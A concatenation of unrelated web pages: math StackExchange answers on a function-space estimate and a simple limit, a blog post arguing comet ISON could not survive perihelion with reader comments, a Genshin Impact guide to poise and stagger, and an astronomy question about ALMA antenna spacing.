Simply put, I don't get why it must hold for all $t$. I think we need to exploit the continuity of $u_n$ and $u$ with respect to $t$ in the larger space $H^{-1}$, but once again $L^q$ is a stronger space than this.
Originally posted on MSE.
The explanation is that by the hypotheses you in fact have $\lVert u_n \rVert_{L^{\infty}([0,T],L^{\infty}(\Omega))} \leq C$ for all $n$: for an arbitrary fixed $t\in[0,T]$ you can take a sequence $t_i\to t$ with $\lVert u_n(t_i) \rVert_{L^{\infty}(\Omega)} \leq C$ and $u_n(t_i)\to u_n(t)$ in $H^{-1}(\Omega)$. Then a subsequence converges also weakly$^*$ in $L^{\infty}(\Omega)$, and hence $u_n(t)$ also lies there with norm at most $C$. So everything written above "for almost all $t$" in fact holds for all $t\in[0,T]$.
https://math.stackexchange.com/questions/2496298/how-to-evaluate-the-limit-lim-h-to-0-frach-sqrth4-2 | # How to evaluate the limit $\lim_{h \to 0}\frac{h}{\sqrt{h+4}-2}$?
I have tried multiplying the numerator and denominator by $\sqrt{h+4}-2$, but I am struggling to simplify it further. I have solved a few problems which usually end up in cancelling out the common variables, but I am unable to simplify this further.
I haven't learnt about L'Hôpital's rule etc. as I have just started learning calculus.
Hint: as $h \neq 0$, $$\frac{h}{\sqrt{h+4}-2} = \frac{h(\sqrt{h+4}+2)}{h+4-4} = \sqrt{h+4}+2$$
• So the limit is 4? Yes, it is thanks! – 10101010 Oct 30 '17 at 9:24
Hint: Rationalise the denominator by multiplying the numerator and denominator by $\sqrt{h+4} +2$ and cancel the $h$'s.
Then you are only left with $\lim_{h \to 0}{\sqrt{h+4}+2}$
The method you'll want to use is multiplying the denominator and numerator both by $\sqrt{h+4} + 2$. Remember to switch the minus to a plus ( or vice versa), otherwise you are just squaring the denominator.
Hint:
The limit is the inverse of
$$\lim_{h \to 0}\frac{\sqrt{4+h}-\sqrt4}{h},$$ which should ring a bell.
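A numerical sanity check of the hints above, comparing the original expression with its rationalized form (a quick sketch):

```python
import math

def f(h):
    """Original expression h / (sqrt(h + 4) - 2)."""
    return h / (math.sqrt(h + 4) - 2)

def g(h):
    """Rationalized form sqrt(h + 4) + 2, valid for h != 0
    and continuous at h = 0, where it equals 4."""
    return math.sqrt(h + 4) + 2

approx = f(1e-6)   # should be very close to 4
```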
http://motls.blogspot.com/2013/12/science-writers-weird-obsession-with.html | ## Sunday, December 01, 2013 ... /////
### Science writers' weird obsession with the resurrection of ISON
The comet has been doomed at least since the first moment when it looked so; claims to the contrary were always just some irrational religion
The good folks who were excited about the alleged resurrection of Jesus Christ were not too unreasonable. To say the least, they were not more unreasonable than most science writers who were producing stories about comet ISON's "survival" in recent days.
When I wrote the satire about the comet's destruction by global warming (yes, there were some readers who didn't understand it was a satire!), I took one claim for granted: the comet couldn't have survived, at least not to the extent needed for the comet to be visible by the naked eye e.g. today and the visibility of ISON's remains would be guaranteed to decrease quickly.
(The debris had magnitude plus 7 late yesterday which already made it invisible. NASA's JPL predicted a year ago that the brightness of the comet could be around minus 11.6 by now, brighter than the full Moon. That prediction has failed rather spectacularly, hasn't it?)
But you must have seen reports by pretty much everyone – Fox News, The Guardian, Matt Strassler, and thousands of others – who were completely excited with their thoroughly unjustified claims that the "comet has survived", "we have a hope", and so on – the similarity of ISON with Son of God is almost perfect.
Let's restore just some common sense and elementary physics.
On November 28th, the comet approached perihelion, the closest point to the Sun on its trajectory. Its distance from the Sun was just a little bit larger than 0.01 AU – AU is the distance between the Earth and the Sun. It was almost 100 times shorter than the Earth-Sun distance. Perhaps 0.015 AU, I forgot the exact number.
Fine. The amount of "watts per squared meter" that you're getting from the Sun depends on the distance as $1/R^2$ – the photons just get spread over the sphere of radius $4\pi R^2$, if you wish. So the number of "watts per squared meter" is approximately $10,000$ times greater at the point of the comet's perihelion than it is here on Earth.
However, the equilibrium temperature is one at which the outgoing thermal radiation matches the incoming one. The outgoing thermal radiation goes like $T^4$ so the equilibrium absolute temperature $T$ "over there" is about $10$ times greater than it is on Earth because $10^4=10,000$. On Earth, it is something like 300 kelvins (the room temperature or so) which means that you expect the temperature on the comet as it approaches this perihelion to go to several thousand of degrees.
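The two scaling laws above combine into $T \propto R^{-1/2}$. A back-of-the-envelope sketch using the round numbers from the text (0.01 AU perihelion distance, 300 K equilibrium temperature at 1 AU):

```python
def equilibrium_temperature(T_earth, R_ratio):
    """Blackbody equilibrium: absorbed flux scales as 1/R^2 and emitted
    radiation as T^4, so the equilibrium T scales as R^(-1/2)."""
    return T_earth * R_ratio ** -0.5

# distance ratio used in the text: ~0.01 AU at perihelion vs 1 AU for Earth
flux_factor = 1 / 0.01 ** 2          # ~10,000x more watts per square meter
T_comet = equilibrium_temperature(300.0, 0.01)
```

This reproduces the factors in the text: about $10^4$ times the flux and an equilibrium temperature near 3000 K, i.e. "several thousand degrees".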
What can be burned near the surface will burn – and become darker in color (think of burned wood). All the ice and water will surely vaporize. At these high temperatures, the water beneath the surface of any "ice core" is moving somewhat frantically and the heat quickly gets deeper inside the comet. Any hole means that all the ice and liquid water vaporizes and gets away.
So what you see when the comet gets this close to the Sun is just some heated material that radiates but the material that has a chance to hold together is nearly black and the remaining material is mostly vaporized which means that the molecules are moving away from others.
Water, ice, and some thin atmosphere are important for the visibility of a comet. It is not hard to see that the atmosphere has no chance to survive the heat. Take the Halley comet whose numbers haven't become obsolete because of the comet's death. Its diameter is of order 10 kilometers. This chunk of mass has some gravitational field but it is tiny. It's more meaningful to talk about the escape velocity from the Halley comet. You know how much it is for similar masses? It is 2 meters per second. If a gas molecule moves faster than 2 meters per second, it will never return. Compare this escape velocity with 11,000 meters per second from the Earth, a large enough value so that NASA needs to use rockets to escape the Earth's gravitational pull.
The escape velocity of 2 meters per second is so tiny that slightly heated gas instantly escapes. To understand this point, realize that at the room temperature (the equilibrium temperature near the Earth, approximately), the average speed of an air molecule is around 500 m/s. Now, the kinetic energy is proportional to the temperature ($3kT/2$ etc.) so the speed is only proportional to the square root of the absolute temperature. I said that the absolute temperature may be around 10 times greater on the comet while near perihelion so the average speed of gas molecules over there will exceed 1,000 m/s. It's much greater than the escape velocity from the comet's very weak gravitational field.
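The numbers in this paragraph follow from $v_{\mathrm{rms}}=\sqrt{3kT/m}$ and $v_{\mathrm{esc}}=\sqrt{2GM/r}$. A sketch using rough published figures for Halley's mass ($\sim 2.2\times10^{14}$ kg) and radius ($\sim 5.5$ km) – assumed values, not taken from the text:

```python
import math

K_BOLTZMANN = 1.380649e-23   # J/K
G = 6.674e-11                # m^3 kg^-1 s^-2
M_N2 = 4.65e-26              # kg, mass of one nitrogen molecule

def rms_speed(T, m=M_N2):
    """Root-mean-square thermal speed, v = sqrt(3kT/m)."""
    return math.sqrt(3 * K_BOLTZMANN * T / m)

def escape_velocity(M, r):
    """Escape velocity from a body of mass M at radius r, v = sqrt(2GM/r)."""
    return math.sqrt(2 * G * M / r)

v_room = rms_speed(300)                          # ~500 m/s, as in the text
v_hot = rms_speed(3000)                          # 10x hotter -> sqrt(10) ~ 3.2x faster
v_esc_halley = escape_velocity(2.2e14, 5.5e3)    # ~2 m/s, as in the text
```

The heated gas moves hundreds of times faster than the comet's escape velocity, which is the quantitative content of "the gas will just tell the comet good-bye".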
So the cute coma is not really bound to the comet once it gets heated up. The gas molecules' speed is vastly higher than the required escape speed and the gas will just tell the comet good-bye, forever.
One could discuss some solid materials that have a chance not to vaporize. Some pure metals could arguably melt and refreeze later. If that happened, the comet could become a mirror which doesn't really reflect much light in generic directions. It probably won't happen, anyway. More likely, one may get some solid leftover material that is dark – and therefore absorbs lots of radiation, with the risk of evaporating earlier. And even if this dark material doesn't evaporate, it won't be visible.
Birth of Jesus Christ, Israel, 2017 years ago
There are obvious reasons why the "nearly compact" heated up material is visible when it is so close to the Sun: it is strongly illuminated by the nearby Sun and it is also producing its own heat and thermal radiation. However, at these high temperatures, there is no good reason to think that a light-colored non-gaseous material will survive anywhere near the comet's surface. Even if the comet (comet ISON's diameter is about 5 kilometers) were large enough to preserve a big chunk of ice etc., it will be hidden "inside" the dark material. The side that is close enough to the Sun – and it's the only side we can see by the naked eyes when the comet cools down again – has been darkened and/or vaporized.
That's the "complicated reason" why I found the hype about the resurrection and the befuddled experts to be simply stupid. Sorry, Matt, your excitement lacked common sense, and the comment that "experts are befuddled as well" is a lame excuse.
But there's one "simpler reason" why I found the reports really stupid. Comet ISON has already been seen to have largely disappeared. Well, this is like the process of dying and this process is, as you may have heard, pretty much irreversible. If the "health" of the comet looks somewhat better than an hour ago, it may be just a coincidence (a more reflective side of the debris was just rotated in the right direction or whatever). But to expect the comet to reappear in its original strength is exactly as naive as to expect a human being or Jesus Christ to be resurrected – apologies to the Christians who may think it is not naive. It violates the second law of thermodynamics and such violations are statistically allowed but only if they're "small".
Note that some comets in the empty space have no problems with the escape velocity etc. The temperature of outer space (its cosmic microwave background) is around 2 kelvins which is 100+ times lower than the room temperature (on Earth). That makes the thermal speed about 10 times smaller, comparable to dozens of meters per second, and some heavy comets may be able to beat it. (And the Halley comet distance at the perihelion is 0.6 AU, so the conditions on the comet are never too different from those on the Earth.)
You might also ask why it is that exactly "now", comet ISON died. Such comets exist for billions of years so why now? Well, there probably used to be many more comets at the beginning. Their number is dying away.
For exactly elliptical orbits, it would be very unlikely or impossible for the comet to approach very close to the Sun if it didn't do so during its previous perihelion (the elliptical orbits are periodic). But I guess that there is some friction that reduces the velocity of the comet. For the "radial" direction, this doesn't matter much because the radial velocity is increased by the Sun's gravity again. However, no one is "restoring" the transverse, angular components of the velocity, which is why the comets' impact parameter is probably continuously decreasing (while the eccentricity increases); their speed is getting directed in the radial direction, making it increasingly likely that they will hit the Sun ("be sucked by the Sun") or its vicinity.
You may be sad but please forget about resurrection: Whatever material is left out of comet ISON will never look like a sexy hairy shining babe again, especially not to your naked eyes. The comet was visible shortly after it was doomed because it was heated by the nearby Sun and it was strongly illuminated by the nearby Sun. But already now, the distance of the comet from the Sun has increased 10 times relative to the perihelion, and as the distance continues to increase, the illumination by the Sun will go down much like the comet's temperature, and the chance to see it with naked eyes will plummet to zero (from the already hopeless current values).
(BTW I was also close to writing something stupid about the comet. On Tuesday afternoon, before 5 pm or so, I saw Sirius which seemed brighter than I remembered it. Before I got home, I was convinced it had to be ISON. I even wrote two quick e-mails and 6 lines of a prepared blog post about the happy experience. But then I quickly got back to my senses, realizing that the location, timing, and shape were all wrong, and I wouldn't be trying to hide for a second that I was being stupid for half an hour. But some people are being stupid for days if not years or decades and they're trying to hide their stupidity in elaborate ways which is bad.)
#### snail feedback (38) :
I wished for, and therefore I got, a Like button! :-)
Two things about ISON spring to mind.
Water. When is it visible? Clearly you can see ice. However, you can't see steam; it's transparent. Once condensed, you can see it again. Is the lack of a tail a result of the water being steam, and not condensing out into a mist?
Secondly, I hear lots about the comet being a means of determining the state of the primordial solar system. However, it's on a hyperbolic trajectory. What evidence is there that it comes from our solar system, and isn't a visitor from another solar system? It's odd that it's a sun grazer. If it was in orbit around the sun, then to come into the inner solar system it can't have had much angular momentum. It would need a large mass to divert it into the centre. Seems odd to me.
In your finite human mind, resurrection is not possible. But with God, who is the creator of your finite mind and everything in the universe, anything is possible. Jesus lives because he is God in the flesh; he created men from the dust of the Earth. He surely can resurrect a dead body. He SPOKE everything into existence. Praise Jesus!!!!!!!
Creation and annihilation operators and path integrals go beautifully hand in hand together and not just as alternative options; see the Faddeev & Slavnov book on gauge fields and Xiao-Gang Wen's book on quantum field theory of many-body systems.
Mr Motl, I agree with you that energy conservation is not valid all around the known universe. But if, as you say, energy conservation is simply invalid and any physical process can generate energy, then why are perpetual motion machines mocked?
Nice article I agree with :-)
I think being able to reproduce the (relevant) results one wants to generalize, apply to new systems or situations, etc is a necessary prerequisite to ensure that one knows what one is doing in new research. Feynman is exactly right !
And it is not true that good theoretical physicists, who are very strong in formal work for example, have a deficit concerning language issues. On the contrary, I have observed that they have the clearest way of thinking and writing when explaining or presenting stuff, use technical terms and definitions consistently (conversely to the situation in softer sciences), and avoid unnecessary babbling and creating impenetrable fogs (which people who don't know what they are talking about often do; compare for example high- and low-level questions on Physics SE...), but often have an immensely cool, nice sense of humor that makes one roll on the floor ;-)
When I became interested in applications of renormalization group ideas to turbulence, I immediately liked the ERG (or functional renormalization group) approach, which seems to be much more general, much better than the method introduced by Orszag et al., which relies on many approximations, does not allow for operators or interactions to become (ir)relevant in the course of the RG flow, etc ... :-P.
And it is slightly regrettable that Zwiebach said right at the beginning that he will use no path integrals in his book ...
Cheers
Lenny Susskind often mentioned (in his own funny way) in his video lectures that he hates learning things by heart but prefers being able to derive them because he understands them ...
This is exactly my point of view too (even though I am by no means able to derive everything I'd like to be able to, of course ...) ;-P
Hello Dr. Lubos Motl,
This is Kavan writing you. I am a student at the univ of Virginia.
I had the pleasure to read your answers on physics forums about the concept of a photon interfering with itself. Very good. I know this space is for comments on ISON, but I could not find your email to contact you. I would like to ask you some very basic questions on the topic. Let me know if you have some time and I will email you my queries. Best regards,
Kavan
Dear Rijul, it is mocked because in the Earth-like conditions, the spacetime is nearly flat and the energy conservation holds almost accurately.
Almost equivalently, the time needed to change the energy by 100 percent or so due to the cosmological nonconservation is of order 10 billion light years, so it is not a fast enough or practical way to produce energy for free.
ISON's perihelion speed was ~250 miles/sec. If the sun were cold monoatomic hydrogen, that most probable relative velocity gives a temp around 8 million K. Warm. However, the comet is belching insulating vapor re the Leidenfrost effect. It also has a blunt leading shock wave reflecting much of the nastiness, re space capsule heat shields. Complicated.
Important are its Roche radius and compression strength re the leading shock. We know ISON has lots of carbon for its Swan line green coma, radiating acetylene and cyanide radicals. ISON will do what ISON does based upon its unknown chemical and physical material properties.
Grant funding by managers requires scientists to be streetwalkers showing thigh all the way up, and promising so much more with zero risk and large DCF/ROI, all of it locked into a PERT chart. The best funding strategy is for a department to, by lottery, assign asinine extreme predictions to its faculty for publicity. Somebody is sure to hit, get funded, then intramurally share the wealth.
Dear Uncle Al, it is physically meaningless to compare the speed of celestial bodies with the thermal speed of gas molecules. The thermal motion has random directions and signs so one may always distinguish it from the collective motion of whole celestial bodies and these two types of contributions to a molecule's motion never mix.
Dear Giotis, Feynman still discovered many theories, like the microscopic theory of superfluidity (of helium) and the Feynman–Gell-Mann theory of the weak force.
Things like partons and path integrals are also a "theory", kind of, and Quantum Electrodynamics, of which he is a co-father, is surely a theory.
Dear Lubos, this may be off-topic, but please can you tell us something about Frank Znidarsic's theory, which uses a classical framework only? Thank you so much.
There are billions of icy objects in the Kuiper Belt, which lies beyond Neptune and out to about 50 AU. Some are very large, such as the planetesimal Pluto, and some are very small. They are relics of the formation of the solar system and, therefore, represent the original makeup of the material that condensed to form that system.
Complex gravitational interactions cause some of them to be ejected into interstellar space and a very few are directed toward the sun. We call these comets.
I'm quite aware of the mechanism. However, even in the Oort cloud they are in an orbit. To get them to become a sun grazer needs them to make a 90 degree turn and effectively go into free fall. That strikes me as very unlikely, particularly for ISON, which is on a once-only trip in on a hyperbolic orbit.
They started advertising the special presentation, Super Comet ISON 2013, [Saturday, Dec. 7 at 10 p.m. ET/PT on Science Channel] during Thanksgiving.
Filled to the brim with hope for comet resurrection, with discrete commercial interruption. I'll be expecting Chevron to remind us all that they really dig windmill power, which is in no way to be construed to mean that they are crony capitalist suck-ups to the regulation state.
Inconvenient comets may evaporate, but overhyped TV events are eternal.
Molten dark metal residue would result in Widmanstätten pattern meteorites, I think.
The NYTimes suddenly finds religion they can believe in.
I agree with most of your blog post, but it is a stretch to say that one shouldn't care about other methods if one's own method works. Obviously there are potential upsides to becoming comfortable with another method, not just familiar, because perhaps it isn't clear at first that it is inferior or superior to your own way.
I'm sure this is what you meant, but it wasn't clear from your text.
We could all go to Stonehenge for the solstice — hold hands, light candles, smoke pot, sing Imagine and shag on the grass under a full moon. Maybe that will save it.
Hey, what about a Comet In Need concert? I'm sure all our new-age pop druids and assorted leftard showbiz Gaia botherers would turn up for free.
Cosmic ecodruids for celestial harmony! Right on, man, yeah!
Are we mad? How can we stand by and let this happen? Have we no feelings? The planet badly needs a sustainable comet policy and we're doing nothing, nothing I tell you.
The UN needs to act now!
Save the comets or the world will end next week!
Thursday, I think. But it might stretch to Saturday lunchtime.
Just after the apéritif hopefully ;-)
According to Russia's ultra-reliable ;) ITAR-TASS news agency, fragments of comet ISON could hit the earth between Christmas and the New Year.
If so, it won't be a planet buster. But a fist-sized chunk of rock and ice could ruin someone's day. Who should it hit:
a) Mullah Omar
b) Miley Cyrus
c) Al Gore
d) My annoying neighbor
This is somewhat off topic, but still of great concern of course. :)
HEALTH WARNING: I'm not a physicist so this might be a dumb question.
I know the standard calculation for getting the Earth's steady-state average temperature (with tweaking for its albedo) from the Sun's output using Stefan's law, and the need to invoke the greenhouse-gas mechanism to explain the temperature difference. It hinges on taking the insolation on a disc the same diameter as the Earth and then simply averaging that over the whole surface of the Earth (four times larger).
I wondered if that averaging were a little too simplistic. What I'm thinking is that if the difference between average day- and night-time temperatures were (I'm guessing for argument's sake) 20 K, then the rate of emission from the Earth would vary by a factor on the order of ~(1+20/300)^4-1, i.e. about 30%, between day and night. Which means, in round terms, losing heat at a 30% lower rate at night than during the day, with possible(?) implications for the resulting calculated steady-state temperature.
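The ~30% figure is straightforward to reproduce (a sketch of the arithmetic, not a climate model):

```python
# Radiated power scales as T^4 (Stefan-Boltzmann), so a 20 K day/night
# swing about 300 K changes the emission rate by this fraction:
T, dT = 300.0, 20.0
factor = (1 + dT / T) ** 4 - 1
print(round(factor, 3))  # 0.295, i.e. roughly 30%
```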
Ignoring the GHG effect, albedo and any other complications for the moment, and taking the Earth as say a thin (pick a depth) copper* spherical shell painted matt black (i.e. a black body), then knowing its thermal conductivity and capacity at every point it should be a straightforward matter to do the integrations and whatnot to arrive at the temperature at time t (modulo 24 hours) for all points on the surface. It isn't obvious to me then whether the resulting average temperature over the Earth's whole surface (necessarily the same for all times t, assuming a steady state) would be the same as that given by the standard calculation. Maybe it should be and I'm about to have a doh! moment thrust upon me, but it isn't.
Does anyone know of such a calculation and its results? Or is there an 'obvious' way one can see this would give the same result as the regular calculation?
* It doesn't have to be copper. Anything will do as long as its properties are nicely behaved for model purposes. Water would be best I suppose as it covers 2/3rds of the surface (ignoring oceanic currents as a first approximation).
Prof. Hsu wouldn't have given his young student Feynman an A, that's for sure. Of course Hsu is totally hung up on the subject of "intelligence" as "g," the underlying correlate of various mental abilities. Feynman only cared about the pudding.
That's called specialization, not limitation.
He also learned to draw and studied ants and women!
Oppenheimer studied Sanskrit I suspect to impress others with how intelligent he was. It really was a waste of time.
Not only was Feynman not bitter. He is an example of a satisfied mind: https://www.youtube.com/watch?v=fxP9zIe0A9E
Right, and I find many of his drawings etc. highly nontrivial, see
In some sense, even Clifford Johnson who loves to be in the top 5% of the "drawing scientists" is just emulating Feynman.
I would like to see Steve's paintings of women - or the arts by other folks who love to pompously present themselves as versatile, cultural men. Most of their image is just empty and offensive postmodern smugness.
Right - but Feynman could and did similar things. He learned to speak Portuguese fairly well and, more esoterically, figured out how to decode Mayan hieroglyphics.
1. Did you mean billions of years? A light year is a unit of distance, not time.
2. What I meant to say is that if someone formulates a concept in which he happens to find a little output energy without input, can it be simply explained by saying that conservation of energy is not exactly correct and is more of an approximation, hence it is OK if some energy is being created in the proposed process?
1. Yes, it's billions of years - in the c=1 units, a year and a light year are the same thing and I implicitly use the units all the time. The same comment may be rephrased to space. The typical "size of the region" you need to change the energy by O(100 percent) is of order tens of billions of light years, too.
2. No, you cannot ever violate the energy conservation law unless you are considering a situation in which the whole global shape of the Universe - its asymptotic behavior at infinite distance - is being transformed. So whatever happens near the Earth will always conserve the energy pretty much exactly, with the deviations' being undetectable. I have already explained that.
You just ignore the answer because you seem obsessed with the idea that the invalidity of the energy conservation law in general cosmology justifies perpetual motion machines on the Earth. It doesn't, not even an iota of a justification.
I have just one more question for now: why are you and most (not all) people so adamant that no one can violate the law of conservation of energy? In many places I have read that the law of conservation of energy is just a law that has not been violated until now; it was also said that to satisfy the law, classical energy had to be redefined to support mass-energy conversion. So my question is, why so much certainty that the law cannot be broken (for earthly or other simple matters), when we can modify basically everything we know and classify it as quantum and classical? Why is someone thought of as a fool if he says that, yes! it is possible, not impossible?
Dear Rijul, it is impossible, not possible, to violate the energy conservation law in this Universe in all situations in which the overall cosmological time-dependent curvature of the Universe may be neglected or plays no role.
The energy conservation law has been shown to be equivalent to the time-translational symmetry of the laws of physics. That's Noether's theorem. Both versions of the law/symmetry are natural and agree with every single observation, arbitrarily accurate one, that has ever been made and every single fundamental or effective law to describe Nature that has ever been extracted from the observations.
That's why people who think that they may violate the energy conservation law in ordinary conditions are imbeciles in the denial of reality, to put it very diplomatically.
Not the temperature of the *comet* from its speed, but the apparent kinetic temperature of an impinging gas molecule upon the comet. De Laval nozzle vacuum-expanded molecular beams have rotational temps hard by absolute zero. In the lab frame they are supersonic (though Mach 1 in vacuum is much lower than 340 m/s for an unremarkable local Mach 20 beam).
http://hyperphysics.phy-astr.gsu.edu/hbase/kinetic/kintem.html
Plain vanilla
http://pac.iupac.org/publications/pac/pdf/2003/pdf/7507x0975.pdf
Chocolate fudge
Dum di dum di dum di dum ....
No takers. OK. I gather it was a dumb question then.
Would any of you be kind enough to say why and briefly point out the kernel of the dumbness? If so—and if you actually do so—I'd be awfully grateful.
Dear John, the right calculation of the Earth's equilibrium temperature deals with average (or total) energy flows.
It's really simple to compute the average solar energy coming to Earth from all directions, averaged over all places, times of day, and seasons.
You want this average inflow of energy to be "per unit of area of the Earth's surface". The area of a sphere is 4.pi.R^2. But the radiation is really hitting the "cross section", which is a disk of area pi.R^2. So you just divide 1340 watts per meter squared by 4 to see how much the Earth is absorbing on average. This does all three averagings automatically and exactly.
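Combining that divide-by-4 absorbed flux with the Stefan-Boltzmann law gives the textbook zero-albedo equilibrium temperature (a sketch using the 1340 W/m² figure quoted above; albedo and greenhouse corrections are ignored):

```python
S = 1340.0       # W/m^2, solar constant as quoted above
sigma = 5.67e-8  # W/m^2/K^4, Stefan-Boltzmann constant
T_eq = (S / 4 / sigma) ** 0.25  # absorbed S/4 balances emitted sigma*T^4
print(round(T_eq))  # ≈ 277 K before albedo/greenhouse corrections
```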
Dear Luboš,
Thank you very much for taking the time to reply. I appreciate it, especially as this is kindergarten-level stuff for you.
"Of course, one may do a more accurate calculation including the profiles and albedos."
Actually, that's (kind of) what I meant. But I also wanted to eliminate complications like albedo as what I was driving at was what I thought was the rather simplistic approach specifically taken to this averaging itself in the standard calculation. And yes, I appreciate that it's the energy flows that are the central issue here (actually that's what I was specifically trying to get at) and that averaging temperatures is just a very crude approach (taken presumably mainly in order to summarise the situation in a single 'alarming' number for ecotard propaganda purposes).
In short, averaging temperatures is a pretty crap way of expressing the energy flows, but given that one is going to do it then one would still want that (almost meaningless) average to be calculated correctly. My question was focused on this latter aspect as I suspect it isn't.
If you don't mind I'd like to come back on this. I intend to take a really simple 'toy' model to illustrate what (I think) I perceive as the essence of the problem. However, since I haven't attempted any formulation or calculation yet I might find that, when I do, my instinct about this is just plain nuts and I'm having a dumbarse senior moment.
Right now though, I'm pushed for time. On top of that my wife has decided to get on my case so I'm at DEFCON 2! :)
https://library.keqingmains.com/combat-mechanics/poise

Poise
An explanation of the Poise system in Genshin and how stagger works.
If you come across any unknown terms, there is a section in the glossary dedicated to terms used for poise mechanics.
# How to Stagger an Enemy
1. Reduce Poise to 0, which will put the enemy into the vulnerable status.
2. Attack the enemy, staggering them. Different stagger levels exist for the various force of attacks that trigger the stagger.
3. Vulnerable status ends, and the poise bar is reset.
# Poise
All units have a hidden poise bar which decreases when receiving attacks that deal poise damage. When the poise bar is depleted to 0, the unit becomes vulnerable. This can be found in each character's attack tables.
$\text{Actual Poise Damage} = \text{Poise Damage} \times \text{Vulnerability}$
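The mechanic described here can be sketched as a toy model (the class and attribute names are my own, not taken from the game's internals):

```python
class PoiseBar:
    """Toy model of the hidden poise bar described above."""

    def __init__(self, max_poise, vulnerability):
        self.max_poise = max_poise
        self.vulnerability = vulnerability  # multiplier on incoming poise damage
        self.poise = float(max_poise)
        self.vulnerable = False

    def take_hit(self, poise_damage):
        # Actual Poise Damage = Poise Damage * Vulnerability
        self.poise = max(0.0, self.poise - poise_damage * self.vulnerability)
        if self.poise == 0.0:
            self.vulnerable = True  # the next attack may stagger

    def reset(self):
        # Called when the vulnerable status ends.
        self.poise = float(self.max_poise)
        self.vulnerable = False

hilichurl = PoiseBar(max_poise=100, vulnerability=1.0)
hilichurl.take_hit(60)
hilichurl.take_hit(60)
print(hilichurl.vulnerable)  # True
```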
## Factors that affect Poise
### Different enemies/characters have different poise, vulnerability, and poise regeneration
A Fatui Cryogunner has more poise, vulnerability, and poise regeneration than a normal Hilichurl. A melee character has more poise, vulnerability, and poise regeneration than a ranged character.
### Some attacks or abilities can change vulnerability
The vulnerability when a Cryogunner is generating their shield is less than when the Cryogunner is spraying. "Increasing resistance to interruption" skills take effect via decreasing vulnerability. The same goes for shields.
### Different sources of interrupt resistance can stack
You can stack Poise and allow your characters to further avoid being staggered.
## Factors that affect Poise Damage
### Different attacks/skills have different poise damage.
Zhongli's elemental skill does more poise damage than his N1.
### Poise damage can change depending on the character's status.
The poise damage of Xiao's plunges increases after activating his burst.
### Large level differences can reduce poise damage.
A low-level Kaeya can't knock back a level 89 Cicin Mage with his E, but a level 50 Kaeya can.
# The Vulnerable Status
Vulnerable Status is a status that occurs when a unit's poise bar is 0. The next attack received by a vulnerable unit may stagger them depending on the level of the stagger.
If an attack has enough force, the attack can both set the target’s status to vulnerable and stagger the target in one go.
### Different enemies/characters have different vulnerable durations.
The duration of a Cryogunner's vulnerable status is less than a normal Hilichurl's. The duration of a melee character's vulnerable status is less than a ranged character's.
### When the vulnerable status ends, the poise bar is reset to its default value.
During the stagger animation, an enemy is still considered vulnerable. Meaning, you can attack an enemy in the stagger animation to override the previous Stagger Level.
C4 Bennett uses a fully-charged level 1 elemental skill, causing a Stonehide Lawachurl to be staggered at Stagger Level 4. Bennett then performs an additional attack, causing the Level 4 Stagger animation to turn into a Level 2 Stagger.
# Impulse Types
When a target is in the vulnerable status, the next attack received may stagger them depending on the level of the stagger.
| Stagger Level | Common Impulse Type | Horizontal Force | Vertical Force |
| --- | --- | --- | --- |
| Default | Mute | 0 | 0 |
| Level 0 | Mute | 0 | 0 |
| Level 1 | Shake | 0 | 0 |
| Level 2 | Light | 200 | 0 |
| Level 3 | Heavy | 200 | 0 |
| Level 4 | Heavy | 800 | 0 |
| Level 5 | Air | 480 | 600 |
| Level 6 | Air | 655 | 800 |
| Level 7 | Air | 0 | 800 |
| Level 8 | Air | 795 | 900 |
| Level 9 | Air | 1200 | 600 |
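For convenience, the stagger-level data above can be encoded as a simple lookup (values transcribed verbatim; the dictionary and function names are mine):

```python
# Maps stagger level -> (impulse type, horizontal force, vertical force)
STAGGER_TABLE = {
    "Default": ("Mute", 0, 0),
    "Level 0": ("Mute", 0, 0),
    "Level 1": ("Shake", 0, 0),
    "Level 2": ("Light", 200, 0),
    "Level 3": ("Heavy", 200, 0),
    "Level 4": ("Heavy", 800, 0),
    "Level 5": ("Air", 480, 600),
    "Level 6": ("Air", 655, 800),
    "Level 7": ("Air", 0, 800),
    "Level 8": ("Air", 795, 900),
    "Level 9": ("Air", 1200, 600),
}

def impulse(level):
    """Return the impulse type and force pair for a stagger level."""
    return STAGGER_TABLE[level]

print(impulse("Level 5"))  # ('Air', 480, 600)
```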
# Force
## Factors that affect Force
### For the object exerting the force:
• The strength and direction of the force is affected by the level of the character/enemy and the talent used.
A low-level Venti can’t throw normal hilichurls into the air with his Q. Bennett can use his fully-charged level 1 E to cause a Level 4 Stagger on Stonehide Lawachurls, while Venti can’t do this with his E.
### For the object on which the force is applied:
• Mass
After using Venti’s elemental skill, a hilichurl is thrown into the air and falls slowly, while an Anemoboxer falls quickly. After using Kaeya’s elemental skill, a hilichurl is knocked back a large distance, while a Cryogunner is only knocked back a small step.
• Drag Force
Chongyun’s N1 can stagger a Mitachurl at Level 4 in the center of Venti’s burst, but can’t when a Mitachurl is standing on the ground. This indicates that the ground exerts a drag force. Ningguang’s charged attack with 2 star jades can only cause a Level 2 Stagger on an Anemoboxer standing on the ground, but can cause a Level 3 Stagger on an Anemoboxer standing on the edge of a meteorite cast by Geo Traveler.
# Credits
Writer: Neptunya#8291 and [Neko]#3521
https://astronomy.stackexchange.com/questions/28659/how-often-do-they-move-most-all-of-almas-dishes

# How often do they move most/all of ALMA's dishes?
The Phys.org article Unknown treasure trove of planets found hiding in dust reports on recently published radio measurements (~1.3mm) of planetary systems forming around stars in Taurus:
Scientists base this scenario of how our solar system came to be on observations of protoplanetary disks around other stars that are young enough to currently be in the process of birthing planets. Using the Atacama Large Millimeter Array, or ALMA, comprising 45 radio antennas in Chile's Atacama Desert, the team performed a survey of young stars in the Taurus star-forming region, a vast cloud of gas and dust located a modest 450 light-years from Earth. When the researchers imaged 32 stars surrounded by protoplanetary disks, they found that 12 of them—40 percent—have rings and gaps, structures that according to the team's measurements and calculations can be best explained by the presence of nascent planets.
The article ends by saying:
Going forward, the research group plans to move ALMA's antennas farther apart, which should increase the array's resolution to around five astronomical units (one AU equals the average distance between the Earth and the sun), and to make the antennas sensitive to other frequencies that are sensitive to other types of dust.
"Our results are an exciting step in understanding this key phase of planet formation," Long said, "and by making these adjustments, we are hoping to better understand the origins of the rings and gaps."
Changing from 15 AU to 5 AU suggests a roughly factor of 3 increase in the overall scale of the pattern of antennas. The linked paper in ApJ by Feng Long et al. has a preprint on arXiv as well, which says:
All observations were obtained from late August to early September 2017 using 45-47 12-m antennas on baselines of 21∼3697 m (15∼2780 kλ), with slight differences in each group (see Table 1).
